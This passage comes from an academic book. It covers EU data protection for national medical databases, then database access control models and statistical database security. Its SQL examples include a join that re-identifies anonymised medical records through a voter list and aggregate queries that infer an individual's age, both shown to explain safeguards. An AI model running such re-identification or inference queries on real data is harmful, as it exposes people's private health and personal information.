Under Article 15 of the Directive, every person shall be granted the right not to be subject to a decision which produces legal effects concerning him or significantly affects him and which is based solely on automated processing of data. If data from a national medical database is used automatically, (e.g., if an insurance company makes an automated decision on an insurance claim, based on information accessed from a national medical database) then the rights of the data subject affected would have been violated.
Exemptions to Certain Obligations and Rights
The Directive (Article 13) provides that member states can restrict the scope of the obligations and rights given in Articles 6(1), 10, 11(1), 12 (previously discussed) and 21 (relating to the publicising of processing operations) in order to safeguard: national security, defence, public security, the prevention, detection, investigation, and prosecution of crime, economic and financial interests, and the protection of data subjects or the rights and freedoms of others.
SOME LEGAL ISSUES

Allowability of Linking and the Scope of Utilisation of Nationally Compiled Data
Two important issues can be identified with the compilation of national medical databases. The first is the allowability of such compilations per se (that is, the linking together of data from previously disparate databases); the other is (provided that the first is positively resolved) the scope of use of such compiled data. The first issue, the mere linking of different databases, is not specifically prohibited by the Directive, but the laws of some EU member states have put an effective ban on the linking itself. For example, in Slovenia it is forbidden to permanently link disparate databases in the public sector (Article 20, Slovenian Personal Data Protection Act 1999). The second issue must be resolved with regard to the Directive, which prohibits data from being used for any other purpose than the one for which it was collected. This means that there must be a legal basis for the collection, compilation, and use of data on the national level. This special legal basis is usually legislation such as a medical database law. Even in the absence of a linking prohibition, a national medical database can still only be built if it is governed by special law. If such law does not exist, it means that data can be linked or physically aggregated, but it can only be used in such a way as if the data were not linked. We consider three possible solutions for these problems.
Tightly Controlled Use of Compiled Records
When national medical databases are compiled, the easiest way to store data is for the data controller to have data (records) kept in an identifiable/personal form. This obviates the need for
costly and sometimes difficult anonymisation processes, it allows for the subsequent quality control of data sets, makes possible further research on raw data, and the addition of new data about individuals. However, tight access controls must then be implemented with permissions to access data for various profiles. Since data are being processed in their personal form, all duties with respect to such processing as set forth in the Directive’s provision must be carried out (e.g., the notification of data subjects).
Anonymisation (De-Identification) of Compiled Data
One possible solution for databases holding national medical records used for research and statistical purposes is anonymisation (viz. de-identification) of data. Anonymised data can be used freely. It does not fall under the scope of the Directive, since it is not deemed personal data. Anonymisation refers to the procedure in which unique identifiers of records are deleted, leaving data that are still individual but that cannot be traced back to any specific individual. Any personal data can be turned into non-personal data by removing unique identifiers. This can be achieved by various means, such as by decoupling data from explicit identifiers (e.g., a name, as compared to an implicit identifier such as an ID number) and full identifiers (i.e., ones that define an individual uniquely) and then destroying any other identifiers (by removing appropriate parts of individual records which together amount to full identifiers, in such a way that no combination of the remaining data amounts to a full identifier). Where records are merely severed into two parts, one with identifiers and the other with data which by itself does not refer to identifiable individuals (the so-called key-coded data, Lowrance, 1997), this is not enough for anonymisation. This is according to the EU Directive and member states’ data protection legislation standards, since
all the data necessary for full identification still lie with the data controller in this case. According to the UK Information Commissioner's Legal Guidance on the UK Data Protection Act 1998:
The Commissioner considers anonymisation of personal data difficult to achieve because the data controller may retain the original data set from which the personal identifiers have been stripped to create the “anonymised” data. The fact that the data controller is in possession of this data set which, if linked to the data which have been stripped of all personal identifiers, will enable a living individual to be identified, means that all the data, including the data stripped of personal identifiers, remain personal data in the hands of the data controller and cannot be said to have been anonymised. The fact that the data controller may have no intention of linking these two data sets is immaterial. (Information Commissioner, 2000)
The UK Information Commissioner's concerns are not without foundation, because research has shown that data thought to be anonymised have been re-identified by linking or matching such data to other data. For example, Sweeney (2000) was able to re-identify anonymised data by directly linking/matching two data sources (medical data and a voter list) on shared attributes (date of birth, zip code, sex). In her later work, Sweeney (2002) concluded that if released information (i.e., anonymised data) is altered so that each record maps onto as many people as possible, then any linking will be ambiguous and it is therefore less likely that anonymised data can be re-identified.
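As a minimal illustration of the linking attack just described, the following SQL sketch (the table and column names are hypothetical, not taken from Sweeney's study) joins a published, “anonymised” medical release to a public voter list on the shared quasi-identifiers mentioned above; every row returned re-identifies an individual:

-- medical_release contains no names, only quasi-identifiers plus sensitive
-- attributes; voter_list is a public register that does contain names.
SELECT v.name, m.diagnosis
FROM   medical_release AS m
JOIN   voter_list      AS v
       ON  v.date_of_birth = m.date_of_birth
       AND v.zip_code      = m.zip_code
       AND v.sex           = m.sex;
-- Any (date_of_birth, zip_code, sex) combination that is unique in both tables
-- links a "de-identified" medical record back to a named person.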
Prohibition of Compilation (Linking)

The most radical solution is to ban the linking altogether, effectively outlawing any medical database with substantial data of various categories. What is banned, of course, is the linking of personal data, which renders any misuse of such data impossible. It is still possible, however, to link (and use in any way) depersonalized personal data (e.g., for research).

Confidentiality and Protection of Records
Due to the fiduciary (trust) relationship that exists between a medical practitioner and a patient, the medical practitioner and associated employees are under a duty of confidence not to disclose medical data provided by a patient unless authorised to do so. This duty is usually enshrined in law, such as in the UK common law of confidence. The Directive further reinforces the law of confidence (and privacy legislation) by virtue of the first data protection principle, which states that data must be processed (which includes disclosure) lawfully. Authorisation to disclose medical data may be given by explicit consent from a patient or may be allowed under special circumstances prescribed by law. With regard to medical data, the Directive (Article 8(3)) states that patient consent is not required where the processing (e.g., disclosure) of medical data is needed for preventive medicine, making a diagnosis, or caring for or treating patients, provided that the data is processed by a healthcare professional subject to professional secrecy rules under his/her national laws. The confidentiality of medical records is of critical importance for both healthcare workers and data subjects. Disclosure of such data can lead to victimisation, humiliation, social exclusion, and prejudicial treatment. Confidentiality is particularly relevant to national medical databases because medical data can be made available anywhere and at any time. Various studies have shown that the confidentiality and security of medical data are amongst the biggest concerns that healthcare workers and patients have. For example, a study by Health
Which? (2003) concluded that the only barrier to the UK public accepting integrated care records to enable the sharing of medical data (amongst medical personnel and patients) was the perception that electronic systems had security issues. Similarly, Ndeti and George (2005) concluded that the main concerns for UK clinicians and patients regarding IT in primary healthcare were patient confidentiality and the security of electronic records. The UK provides a good example of how the confidentiality of medical records in a database can be managed. In the NHS, confidentiality issues have been addressed by various measures such as the NHS Code of Practice on Confidentiality (Department of Health, 2003) and the Caldicott Principles (developed by the Caldicott Committee chaired by Dame Fiona Caldicott; see Department of Health, 2006). Both of these measures are consistent with the principles and provisions of the Directive. The NHS Code of Practice on Confidentiality (Department of Health, 2003) applies to workers within, or under contract to, NHS organisations. It uses a confidentiality model with four main requirements, namely: (i) protecting patients' information; (ii) informing patients about how their information is used; (iii) providing patients with a choice to decide on the disclosure and use of their information; and (iv) continually improving the preceding three requirements (protect, inform, choice). The Caldicott Principles were published in 1997 by the Caldicott Committee, which was set up to review the transfer of patient-identifiable information between NHS organisations (in England) and non-NHS organisations. The six principles state that: (i) the purpose(s) for using confidential information must be justified; (ii) confidential information must only be used when absolutely necessary; (iii) the minimum amount of confidential information required should be used; (iv) access to confidential information should be on a strict need-to-know basis; (v) everyone must understand his or her responsibilities; and (vi) everyone must understand and comply with the law.
Also in the UK, with reference to the creation of Summary Care Records (SCRs), which will eventually form part of the national medical database, the UK Department of Health has proposed specific practices to meet current legal obligations to ensure data protection and confidentiality. All patients are notified before the uploading of their SCR and are given the option to decline one, to limit the future scope of information in the SCR, or to view the contents before uploading. The SCR, however, will be uploaded without the explicit consent of the patient (but subject to notification and an opportunity to respond). After uploading, patients can remove any or all information uploaded to the SCR, and any subsequent additions to the SCR must be agreed between the patient and his/her doctor. Patients will also be able to limit the information which can be made visible without their consent. A wide range of access controls has also been adopted. Only staff with a legitimate relationship with a patient will be able to access that patient's SCR. This includes medical staff acting in an emergency, such as staff working in an accident and emergency department.
Securing an Audit Trail

In some countries, an audit trail of all operations with respect to the processing of personal data is required. Such operations include any operation or set of operations defined as processing under the Directive, including collecting, acquisition, recording, organising, storing, adapting or altering, retrieving, consulting, using, disclosing by transmission, communicating, disseminating or otherwise making available, aligning or linking, blocking, anonymising, erasing, or destroying. Retrieval, in particular, is included in the set of operations for which an audit trail must exist, and this can be problematic, since monitoring and recording all retrievals may present a serious hindrance to system performance. The hindrance to system performance can be both in terms of the storage space needed for audit logs and the number
of system cycles dedicated to monitoring. This is especially relevant to national medical databases due to their potentially large size. The Slovenian Data Protection Act, in particular, requires that it must subsequently be possible to determine when and by whom individual personal data were entered into a filing system, used, or otherwise processed. Such logs must be stored for the period covered by the statutory protection of the rights of individuals with respect to the unauthorised supply or processing of personal data. In the Slovenian case, all civil claims for the violation of privacy have a statute of limitation of 5 years. The requirement to store log files of every operation with respect to the processing of personal data for 5 years is an almost overwhelming duty, one that is usually skirted around by Slovenian companies. An audit trail is also sometimes required for a limited set of operations, such as for the transfer of data to third parties. According to the Slovenian Data Protection Act, data controllers are obliged to ensure that, for each supply of personal data to third parties, it is subsequently possible to determine which personal data were supplied, to whom, when, and on what basis, in respect of the period covered by the statutory protection of the rights of data subjects (i.e., 5 years). In the UK, an audit is not mandatory for the retrieval of data from a database. However, with regard to the setting up of the new UK national medical database, the proposed procedures for protecting medical data include the requirement that all access to an SCR be via a smartcard and PIN and be logged, providing an audit log. All patients will be able to receive a copy of the audit log giving details of access to their SCR. The NHS also guarantees that information in the SCR will not be shared with any organisation without the explicit consent of the patient. However, smartcards have previously proved cumbersome, especially since many staff share or borrow smartcards. It remains to be seen whether audits will capture any abuses and curtail them.
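A minimal sketch of such an audit trail is shown below, written in standard-flavoured SQL under the assumption of a hypothetical schema (all table and column names are illustrative; exact identity-column and interval syntax varies between DBMS). Each supply or retrieval event records the information the Slovenian Act asks for (which data, to whom, when, and on what basis), and the log can later be queried per data subject for the statutory period:

CREATE TABLE disclosure_log (
  log_id       BIGINT GENERATED ALWAYS AS IDENTITY PRIMARY KEY,
  patient_id   BIGINT       NOT NULL,   -- whose data were supplied
  data_items   VARCHAR(200) NOT NULL,   -- which personal data
  recipient    VARCHAR(100) NOT NULL,   -- to whom
  legal_basis  VARCHAR(200) NOT NULL,   -- on what basis
  accessed_by  VARCHAR(100) NOT NULL,   -- operator (e.g., smartcard identity)
  accessed_at  TIMESTAMP    NOT NULL DEFAULT CURRENT_TIMESTAMP
);

-- The application (or a database trigger) writes one row per supply/retrieval:
INSERT INTO disclosure_log (patient_id, data_items, recipient, legal_basis, accessed_by)
VALUES (42, 'summary care record', 'A and E department, Hospital X', 'Article 8(3) treatment', 'dr_jones');

-- A patient's copy of the audit log, covering the statutory 5-year period:
SELECT accessed_at, accessed_by, recipient, data_items, legal_basis
FROM   disclosure_log
WHERE  patient_id = 42
  AND  accessed_at >= CURRENT_TIMESTAMP - INTERVAL '5' YEAR;

The design cost discussed above is visible here: one row per retrieval over a national database quickly dominates storage, which is why the storage term and the set of logged operations are policy decisions rather than purely technical ones.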
CONCLUSION

The technical feasibility of compiling a national medical database from disparate local medical databases and file systems, together with the potential benefits of using a national medical database, may inevitably result in the widespread compilation of such databases. Arguably, a national database can improve the quality and scope of a nation's healthcare services. Some benefits include that it can: facilitate the provision of pervasive healthcare by enabling healthcare professionals to access medical data anytime, anywhere, and “on-demand”; facilitate information sharing across organisational and physical boundaries; provide demographic and epidemiological data for research and clinical purposes; facilitate the standardisation of medical records, generally leading to improved data quality and integrity; and help in the management of national medical resources. While national medical databases arguably facilitate an improvement in the access, availability, and use of medical data, the potential concerns relating to data protection issues (including the privacy and confidentiality of medical information) remain. In order to address these concerns, there has been much progress in implementing security and access measures such as hardware and software controls, audit trails, and confidentiality policies, amongst others. However, the nature of any networked digital infrastructure makes it prone to security breaches, as evidenced by past well-publicised breaches of military and financial systems, especially in the United States. Further, security breaches may not always be due to unauthorised access, since, for example, an unscrupulous employee with access to a national medical database may acquire and use medical data for various illegal purposes (such as to sell to private companies). Compared to a local database, there is a greater risk of unauthorised access to a national medical database due to the fact that it can generally be
accessed nationally at any time, and by multiple users and organisations. There is also a greater possibility of errors in medical data due to the volume of data handled. A recent UK survey of over 56 million patient records held by general practitioners (GPs) in England and Wales found evidence of duplicate registrations, inaccurate and incomplete data capture, errors in medical records, and incomplete transfer of information between systems (Audit Commission, 2006). It is quite possible that such problems (some due to human error and deliberate deception, amongst other reasons) may be magnified in a national medical database. Further, any illegal or negligent processing of data in a national medical database may have greater consequences for a data subject. This is because an incorrect or inaccurate medical record from a national database can be accessed by multiple healthcare professionals and providers to make decisions regarding a patient (data subject). Correcting errors and inaccuracies on a medical record that has been widely accessed may not always be easy, since incorrect/inaccurate copies of the medical record may exist (and be in use) in many different national organisations at a given time. Invariably, the decision regarding the creation and use of a national medical database will involve striking the right balance between the concerns about the data protection (including privacy and confidentiality) of medical data and the benefits (to the public) of sharing such data. Public health considerations and social objectives may heavily tip the balance towards data sharing. This will inevitably lead to some erosion of individual privacy and confidentiality (protected in part by EU data protection legislation). The possibility of larger-scale compilations of identifiable medical data, such as a regional medical database (for example, a European Union medical database), provides even more cause for concern with regard to data protection. This is particularly relevant in light of the EU Commission's stated aim (outlined in September 2006) to establish
interoperability between member states' healthcare IT systems, and hence share patients' medical details between member states (EU Commission, 2006). Indeed, in 2007 the EU began issuing calls for research proposals (via the Competitiveness and Innovation Framework Programme (CIP)) to investigate how best to achieve its interoperability objective. The concept of a regionally or globally accessible medical database is not new and already exists. For example, the US Armed Forces Health Longitudinal Technology Application (AHLTA) electronic health record system serves over 9 million patients worldwide (servicemen, veterans, and their families), most with medical records online (Elenfield & Carraher, 2006). Given the many healthcare research initiatives (e.g., EU Commission, 2006) and in-depth studies (e.g., Audit Commission, 2006), together with high-level policy decisions, it is inevitable that improvements in technology will continue to drive or enable healthcare change. However, it is important that the consequences of such change are carefully balanced with existing rights, especially the rights of individuals in a society. Indeed, the creation of national medical databases in the EU, while beneficial (e.g., for epidemiological and demographic purposes), will continue to raise data protection concerns regarding the security and processing of patient data. Such concerns are well placed, especially since (in light of the EU Commission's stated aims regarding interoperability) EU national medical databases may eventually be linked to a regional EU-wide healthcare infrastructure.
REFERENCES

Anderson, R. (2007). Security of medical information systems. Retrieved from http://www.cl.cam.ac.uk/~rja14/#Med

Audit Commission. (2006). National duplicate registration initiative. Health national report, August 2006. Retrieved from http://www.audit-commission.gov.uk/Products/NATIONAL-REPORT/009F4715-3D93-4586-A3A07BF69405A449/NationalDuplicateRegistrationInitiative02Aug06REP.pdf

Department of Health. (2006). The Caldicott Guardian Manual 2006. Retrieved from http://www.connectingforhealth.nhs.uk/systemsandservices/infogov/policy/resources/new_gudance

Department of Health. (2003). Confidentiality: NHS Code of Practice. November 2003. Retrieved from http://www.dh.gov.uk/en/Publicationsandstatistics/Publications/PublicationsPolicyAndGuidance/DH_4069253

Department of Health. (2002). Delivering 21st century IT support for the NHS. National Strategy Programme. Retrieved from http://www.dh.gov.uk/prod_consum_dh/groups/dh_digitalassets/@dh/@en/documents/digitalasset/dh_4071684.pdf

Elenfield, V., & Carraher, J. (2006). Lessons learned in implementing a global electronic health record. HIMSS Annual Conference, February 14, 2006. Retrieved from http://www.himss.org/content/files/lessonslearned_imp_ehr.pdf

EU Commission. (2006). Connected health: Quality and safety for European citizens. Retrieved from http://ec.europa.eu/information_society/activities/health/docs/policy/connected-health_final-covers18092006.pdf

Healthcare Information and Management Systems Society. (2007). EHR, electronic health record. Retrieved from http://www.himss.org/ASP/topics_ehr.asp

Health Which? (2003). The public view on electronic health records. Health Which? and NHS National Programme for Information Technology, 7 October 2003. Retrieved from http://www.dh.gov.uk/prod_consum_dh/groups/dh_digitalassets/@dh/@en/documents/digitalasset/dh_4055046.pdf

Hunter, K. (2002). Electronic health records. In S. Englebardt & R. Nelson (Eds.), Health care informatics: An interdisciplinary approach (pp. 209-230). Mosby.

Information Commissioner. (2000). Data Protection Act 1998: Legal guidance (p. 14). Retrieved from http://pkl.net/~matt/uni/ct218/other%20useful%20documents%20(not%20examinable)/Legal%20Guidance%20on%20DPA.doc

Information Commissioner's Office. (2007). The Information Commissioner's view of NHS electronic care records. Retrieved from http://www.ico.gov.uk/upload/documents/library/data_protection/introductory/information_commissioners_view_of_nhs_electronic_care_reco%E2%80%A6.pdf

Lowrance, W. (1997). Privacy and health research: A report to the U.S. Secretary of Health and Human Services. Retrieved from http://aspe.os.dhhs.gov/datacncl/phr.htm

Ndeti, M., & George, C. E. (2005). Pursuing electronic health: A UK primary health care perspective. In M. Funabashi & A. Grzech (Eds.), Challenges of expanding Internet: E-commerce, e-business, and e-government: Proceedings of the 5th IFIP Conference on e-Commerce, e-Business, and e-Government (I3E'2005), October 28-30, 2005, Poznan, Poland. Springer.

NHS Factsheet. (2005). The spine. Retrieved from http://www.connectingforhealth.nhs.uk/resources/comms_tkjune05/spine_factsheet.pdf

Royal Society. (2006). Digital healthcare: The impact of information and communication technologies on health and healthcare. Retrieved from http://www.royalsoc.ac.uk/displaypagedoc.asp?id=23835

Shortliffe, E. H., & Barnett, G. O. (2001). Medical data: Their acquisition, storage, and use. In E. H. Shortliffe & L. E. Perreault (Eds.), Medical informatics: Computer applications in health care and biomedicine (pp. 41-75). Springer.

Sweeney, L. (2002). k-Anonymity: A model for protecting privacy. International Journal of Uncertainty, Fuzziness and Knowledge-Based Systems, 10(5), 557-570.

Sweeney, L. (2000). Uniqueness of simple demographics in the U.S. population (LIDAP-WP4). Carnegie Mellon University, Laboratory for International Data Privacy, Pittsburgh, PA.
This work was previously published in Ethical, Legal, and Social Issues in Medical Informatics, edited by P. Duquenoy, C. George, and K. Kimppa, pp. 228-248, copyright 2008 by Medical Information Science Reference (an imprint of IGI Global).
Chapter 7.7
Database Security and Statistical Database Security
Edgar R. Weippl
Secure Business Austria, Austria
INTRODUCTION

In this article we will present an introduction to issues relevant to database security and statistical database security. We will briefly cover various security models, elaborate on how data analysis in data warehouses (DWH) might compromise an individual's privacy, and explain which safeguards can be used to prevent attacks. In most companies, databases are an essential part of the IT infrastructure since they store critical business data. In the last two decades, databases have been used to process increasing amounts of transactional data, such as a complete account of a person's purchases from a retailer or connection data from calls made on a cell phone. As soon as this data became available from transactional databases and online transactional processing (OLTP) became well established, the next logical step was to use the knowledge contained in the vast amounts of data. Today, data warehouses (DWH) store aggregated data in an optimal way to serve queries related to business analysis.
In recent years, attention has increasingly shifted to security. Early OLTP applications were mainly concerned with the integrity of data during transactions; today privacy and secrecy are more important, as databases store an increasing amount of information about individuals and data from different systems can be aggregated. Thuraisingham (2002) summarizes the requirements briefly as “However, we do not want the information to be used in an incorrect manner.” All security requirements stem from one of three basic requirements: confidentiality (aka secrecy), integrity, and availability (CIA). Confidentiality refers to the requirement that only authorized subjects, that is, people or processes, should be permitted to read data. Integrity means that unauthorized modifications must not be permitted. This includes both modifications by unauthorized people and incorrect modification by authorized users. To correctly perform the services requested, the system needs to remain available; a denial-of-service attack compromises the requirement of availability.
Other security requirements may include privacy, non-repudiation, and separation of duties. These are, however, composite requirements that can be traced back to one of the three basic requirements. Privacy, for instance, is the non-disclosure (i.e., confidentiality) of personal data; non-repudiation refers to the integrity of transaction logs and the integrity of origin. Throughout this article we will focus only on technical attacks and safeguards and not on social engineering. Social engineering is often the easiest and, in many cases, a very successful attack vector. For in-depth coverage of social engineering we recommend Böck et al. (2007). In Section 2 we cover the most relevant access control models; in Section 3 we provide an overview of security in statistical databases. Finally, in Section 4 we highlight the essentials of securing not only the transactional and statistical databases but the entire system.
BACKGROUND

Access control is the most important technique or mechanism for implementing the requirements of confidentiality and integrity. Since databases were among the first large-scale systems in military applications, there is a long history of security models, dating back to the 1960s. The basic principle in all access control models is that a subject is or is not permitted to perform a certain operation on an object. This process is described by the triplet (s, op, o). A security policy specifies who is authorized to do what. A security mechanism allows enforcement of a chosen security policy. One can distinguish between two fundamentally different access control mechanisms: discretionary access control (DAC) and mandatory access control (MAC). In DAC models the user decides which subject is able to access which object to perform a certain operation. In contrast, when using MAC, the system decides who is allowed to access which resource, and the individual user has no discretion to decide on access rights.

Discretionary Access Control (DAC)

In relational database management systems (DBMS), the objects that need to be protected are tables and views. Modern DBMS allow a fine granularity of access control, so that access to individual fields of a record can be controlled. By default, a subject has no access. Subjects may then be granted access, which can be revoked at any time. In most systems the creator of a table or a view is automatically granted all privileges related to it. The DBMS keeps track of who subsequently gains and loses privileges, and ensures that only requests from subjects who, at the time the request is executed, have the required privileges are allowed.
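As a brief illustration (the table, view, and user names are hypothetical), discretionary access control in SQL is exercised with GRANT and REVOKE statements, and the grantor may allow the grantee to pass a privilege on at his or her own discretion:

-- Alice, the creator of the table, grants Bob read access through a view only:
GRANT SELECT ON patient_summary_view TO bob;

-- Column-level control: Bob may update only the contact details:
GRANT UPDATE (phone, address) ON patient TO bob;

-- WITH GRANT OPTION lets Bob delegate the privilege at his own discretion:
GRANT SELECT ON patient_summary_view TO bob WITH GRANT OPTION;

-- Access can be withdrawn at any time; CASCADE also revokes Bob's re-grants:
REVOKE SELECT ON patient_summary_view FROM bob CASCADE;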
Mandatory Access Control (MAC)

Mandatory Access Control is based on system-wide policies that cannot be changed by individual users. Each object in the database is automatically assigned a security class based on the access privileges of the user who created the object. The most widely known implementation of a MAC system is a multi-level security (MLS) system. MLS systems were first described by Bell and LaPadula (Bell, 1975) in the 1960s. Each subject, which could be either a user or a user program, is assigned a clearance for a security class. Objects are assigned security levels. Security levels and clearances can be freely defined as long as all items are pair-wise comparable. The most common security classes (i.e., levels and clearances) are top secret (TS), secret (S), confidential (C), and unclassified (U). Rules based on security levels and clearances govern who can read or write which objects. Today, there are only a few commercially available systems that support MAC, such as SELinux or the Oracle DBMS (Version 9 and higher)
when the Oracle Label Security (OLS) option is installed. The main reason to use a MAC system is that it prevents an inherent flaw of discretionary access control, commonly referred to as the Trojan horse problem. Suppose Alice creates a table mySecret that only she can read and gives Bob INSERT privileges on it; Bob knows nothing about this. Alice then modifies the code of an executable that Bob uses so that it additionally writes Bob's secret data to the table mySecret. Now Alice can see Bob's secret data. While the modification of the application code is beyond the DBMS's control, a MAC-enabled DBMS can still prevent the use of the database as a channel for secret information.
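The following conceptual sketch shows the idea behind row-level MAC; it is not Oracle Label Security syntax, all names are illustrative, and session_clearance() is a hypothetical helper (shown here, PostgreSQL-style, reading a session variable) standing in for whatever mechanism supplies the subject's clearance at login. Every row carries a sensitivity label, and a view compares it with the session's clearance so that “no read up” holds regardless of any discretionary grants:

-- Clearance levels: 0 = unclassified, 1 = confidential, 2 = secret, 3 = top secret
CREATE TABLE mission (
  mission_id INT PRIMARY KEY,
  details    VARCHAR(500),
  row_label  SMALLINT NOT NULL CHECK (row_label BETWEEN 0 AND 3)
);

-- Hypothetical helper: the clearance is set by the login machinery as a
-- session variable and read back here (PostgreSQL current_setting).
CREATE FUNCTION session_clearance() RETURNS SMALLINT AS
$$ SELECT CAST(current_setting('app.clearance') AS SMALLINT) $$
LANGUAGE SQL STABLE;

-- "No read up": a subject sees only rows at or below its own clearance.
CREATE VIEW mission_mls AS
  SELECT mission_id, details, row_label
  FROM   mission
  WHERE  row_label <= session_clearance();

-- Users query only the view; discretionary grants on the base table are removed,
-- so the labels, not individual users, decide what is visible.
REVOKE ALL ON mission FROM PUBLIC;
GRANT SELECT ON mission_mls TO PUBLIC;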
ACCESS CONTROL FOR RELATIONAL DATABASES

Role-Based Access Control (RBAC)

With RBAC (Sandhu, 2000), system administrators create roles according to the job functions defined in a company; they grant permissions to those roles and subsequently assign users to the roles on the basis of their specific job responsibilities and qualifications. Thus, roles define the authority of users, the competence that users have, and the trust that the company gives to the user. Roles define both the specific individuals allowed to access objects and the extent to which, or the mode in which, they are allowed to access them (see Sandhu, Coyne, Feinstein, & Youman, 1996). Access decisions are based on the roles a user has activated (Sandhu, Ferraiolo, & Kuhn, 2000). The basic RBAC model consists of four entities: users, roles, permissions, and sessions. A user is a subject who accesses different, protected objects. A role is a named job function that describes the authority, trust, responsibility, and competence of a role member. A permission is an approval for a particular type of access to one or more
objects. Permissions describe which actions can be performed on a protected object and may apply to one or more objects. Both permissions and users are assigned to roles. These assignments, in turn, define the scope of access rights a user has with respect to an object. By definition, the user-assignment and permission-assignment relations are many-to-many relationships. Users establish sessions during which they may activate a subset of the roles they belong to. A session maps one user to many possible roles, which means that multiple roles can be activated simultaneously, while every session is assigned to a single user. Moreover, a user might have multiple sessions open simultaneously. Belonging to several roles, a user can invoke any subset of those roles to accomplish a given task. In other words, sessions enable a dynamic activation of user privileges (see Sandhu, Coyne, Feinstein, & Youman, 1996). We will briefly summarize various properties of the NIST RBAC model as pointed out by Sandhu, Ferraiolo, and Kuhn (2000). RBAC does not define the degree of scalability implemented in a system with respect to the number of roles, number of permissions, size of the role hierarchy, or limits on user-role assignments.
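Most SQL DBMS expose these RBAC entities directly. The sketch below assumes the referenced tables and users already exist; the role, table, and user names are hypothetical, and details such as SET ROLE vary between products. It shows permission-role assignment, user-role assignment, and role activation within a session:

-- Permission-role assignment: each role bundles the privileges of a job function.
CREATE ROLE ward_nurse;
GRANT SELECT, INSERT ON observation TO ward_nurse;
GRANT SELECT ON patient TO ward_nurse;

CREATE ROLE billing_clerk;
GRANT SELECT ON invoice TO billing_clerk;

-- User-role assignment: a user may belong to many roles.
GRANT ward_nurse TO carol;
GRANT billing_clerk TO carol;

-- Session: the user activates only the subset of roles needed for the task at hand.
SET ROLE ward_nurse;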
Coexistence with MAC / DAC

Mandatory access control (MAC) is based on distinct levels of security to which subjects and objects are assigned. Discretionary access control (DAC) controls access to an object on the basis of an individual user's permissions and/or prohibitions. RBAC, however, is an independent component of these access controls and can coexist with MAC and DAC. RBAC can be used to enforce MAC and DAC policies, as shown in Osborn, Sandhu, and Munawer (2000). The authors point out the possibilities and configurations necessary to use RBAC in the sense of MAC or DAC.
Levels Defined in the NIST Model of RBAC
The NIST Model of RBAC is organized into four levels of increasing functional capabilities, as mentioned above: (1) flat RBAC, (2) hierarchical RBAC, (3) constrained RBAC, and (4) symmetric RBAC. These levels are cumulative, such that each adds exactly one new requirement. The following subsections offer a brief presentation of the four levels. The basic principle is that users are assigned to roles (user-role assignment, indicated through the membership association), permissions are assigned to roles (permission-role assignment, indicated through the authorization association), and users gain the permissions defined in the role(s) they activate. A user can activate several roles within a session (indicated through the n-ary activation association). As all these assignments are many-to-many relationships, a user can be assigned to many roles and a role can contain many permissions. Flat RBAC requires a user-role review whereby the roles assigned to a specific user can be determined, as well as the users assigned to a specific role. Similarly, flat RBAC requires a permission-role review. Finally, flat RBAC requires that users can simultaneously use permissions granted to them via multiple roles. Flat RBAC represents the traditional group-based access control as it can be found in various operating systems (e.g., Novell Netware, Windows NT). The requirements of flat RBAC are obvious and obligatory for any form of RBAC. According to Sandhu, Ferraiolo, and Kuhn (2000), the main issue in defining flat RBAC is to determine which features to exclude. Hierarchical RBAC supports role hierarchies built using the sub-role and super-role association. A hierarchy defines a seniority relation between roles, whereby senior roles acquire the permissions of their juniors. Role hierarchies may serve three different purposes:

•	Inheritance hierarchies, whereby activation of a role implies activation of all junior roles;
•	Activation hierarchies, whereby there is no implication of the activation of all junior roles (each junior role must be explicitly activated to enable its permissions in a session); or
•	A combination of both.
Constrained RBAC supports separation of duties (SOD). SOD is a technique for reducing the possibility of fraud and accidental damage. It spreads responsibility and authority for an action or task over multiple users, thereby reducing the risk of fraud. Symmetric RBAC adds requirements for a permission-role review similar to the user-role review introduced in flat RBAC. Thus, the roles to which a particular permission is assigned can be determined, as well as the permissions assigned to a specific role. However, implementing this requirement in large-scale distributed systems may be a very complex challenge.
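As a small illustration of constrained RBAC (the table and role names are hypothetical), a static separation-of-duties rule such as “no user may hold both the invoice_approver and payment_issuer roles” can at least be audited directly against the user-role assignment relation:

-- Users violating the static separation-of-duties constraint:
SELECT user_id
FROM   user_role_assignment
WHERE  role_name IN ('invoice_approver', 'payment_issuer')
GROUP  BY user_id
HAVING COUNT(DISTINCT role_name) > 1;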
Usage Control

According to Bertino et al. (2006), secure data mining is an aspect of secure knowledge management. The authors emphasize the importance of usage control (cf. Park & Sandhu, 2004) to implement continuous decisions about whether a resource may or may not be used. Similar to the reference monitor in classical access control, Thuraisingham (2005) proposed to use a privacy controller to “limit and watch access to the DBMS (that access the data in the database).” She sees a privacy constraint as a form of integrity constraint, and proposes to use mechanisms of the DBMS for guaranteeing integrity: “In these techniques, some integrity constraints, which are called derivation rules, are handled during query processing, some integrity constraints, known as integrity rules, are handled during database updates, and some integrity constraints, known as schema rules, are
handled during database design” (Thuraisingham, 2005).
STATISTICAL DATABASE SECURITY

A statistical database contains information about individuals, but allows only aggregate queries (such as asking for the average age instead of Bob Smith's age). Permitting queries that return aggregate results only may seem sufficient to protect an individual's privacy. There is, however, a new problem compared to traditional database security: inference can be used to infer some secret information. A very simple example illustrates how inference causes information leakage: if I know Alice is the oldest employee, I can ask “How many employees are older than X years?” Repeating this process for different values of X until the database returns the value 1 allows us to infer Alice's age. The first approach to prevent this kind of “attack” is to enforce that each query must return data aggregated from at least N rows, with N being certainly larger than 1 and, in the best case, a
Figure 1. Security control models (Adam, 1989). Restriction-based protection either gives the correct answer or no answer to a query (top); data may be modified (perturbated) before it is stored in the data warehouse or the statistical database (middle); online perturbation modifies the answers for each query (bottom).
very large number. Yet, unfortunately, this is no real solution. The first step is to repeatedly ask “How many employees are older than X?” until the system rejects the query because it would return fewer than N rows. Now one has identified a set of N+1 employees, including Alice, who are older than X; let X=66 at this point. Next, ask “Tell me the sum of ages of all employees who are older than X.” Let the result be R. Next, ask “Tell me the sum of ages of all employees who are not called Alice and are older than X.” Let the result be RR. Finally, subtract RR from R to obtain Alice's age. For an in-depth description we recommend Castano (1996).
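The attack can be written down as a handful of aggregate queries (the employees table and its columns are hypothetical); each query on its own satisfies a naive minimum-set-size check, yet their combination reveals one person's age:

-- Step 1: probe with increasing thresholds; suppose the last value accepted
-- before the size control rejects the query is 66, leaving a small set of
-- employees older than 66 that includes Alice.
SELECT COUNT(*) FROM employees WHERE age > 66;

-- Step 2: aggregate over that small set, Alice included (result R).
SELECT SUM(age) AS r  FROM employees WHERE age > 66;

-- Step 3: the same aggregate with Alice excluded (result RR).
SELECT SUM(age) AS rr FROM employees WHERE age > 66 AND name <> 'Alice';

-- Alice's age = R - RR, although no query ever returned an individual record.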
Restriction-Based Techniques

